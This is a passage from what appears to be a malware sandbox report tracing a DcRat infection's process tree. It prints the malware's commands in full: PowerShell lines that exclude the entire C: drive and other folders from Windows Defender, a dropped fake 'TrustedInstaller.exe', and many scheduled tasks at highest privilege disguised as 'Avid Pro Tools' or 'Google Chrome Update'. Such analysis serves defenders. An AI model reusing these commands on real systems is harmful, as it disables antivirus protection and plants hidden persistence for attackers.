C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqtzcw4y\cqtzcw4y.cmdline"7⤵
- Loads dropped DLL
PID:7116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12A8.tmp" "c:\winNet\CSC35AC1482CA674AE5A4682B0E9D49A28.TMP"8⤵PID:6344
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuwg5pdy\yuwg5pdy.cmdline"7⤵
- Loads dropped DLL
PID:5684 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13C2.tmp" "c:\DriversavessessionDlldhcp\CSC91E33477D10D4389B8D462A4608C15A1.TMP"8⤵PID:5936
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a1si3ueb\a1si3ueb.cmdline"7⤵
- Loads dropped DLL
PID:3336 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES144E.tmp" "c:\Users\Admin\Music\CSCE81E5B3D68EC4E5A97015F99F63D030.TMP"8⤵PID:1552
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5otnzkc\b5otnzkc.cmdline"7⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:6652 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1596.tmp" "c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP"8⤵PID:3944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:3116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:4172
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tvn8rY4Wma.bat"7⤵PID:5464
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:6800
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:6692
-
-
C:\Users\Admin\AppData\Local\TrustedInstaller.exe"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"8⤵
- Executes dropped EXE
PID:6300
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe"C:\Users\Admin\AppData\Local\Temp\faildsfsdf.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" & exit3⤵PID:6760
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:6944
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:7000
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:7060
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit3⤵PID:5268
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST4⤵
- DcRat
PID:688
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6028
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:400
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5968
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5176
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2472
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5440
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5736
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:3916
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6672
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:5740
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5812
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6264
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:6424
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2912
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:6232
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4532
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:4468
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6756
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6448
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3460
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2348
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6628
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2948
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2872
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2384
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1788
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6968
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:6116
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4088
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:1508
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2804
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2472
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:4532
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6168
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:7112
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5408
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6252
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1660
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6996
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5652
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2932
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5780
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:4176
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3312
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6268
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3772
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:376
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6740
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2728
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2112
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:5428
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6328
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6232
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5760
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6560
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4340
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:6188
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1992
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5824
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3928
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:5436
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5860
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3460
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:5144
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:4004
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:392
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:744
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:4956
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:4828
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:6820
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:6904
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1536
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST4⤵
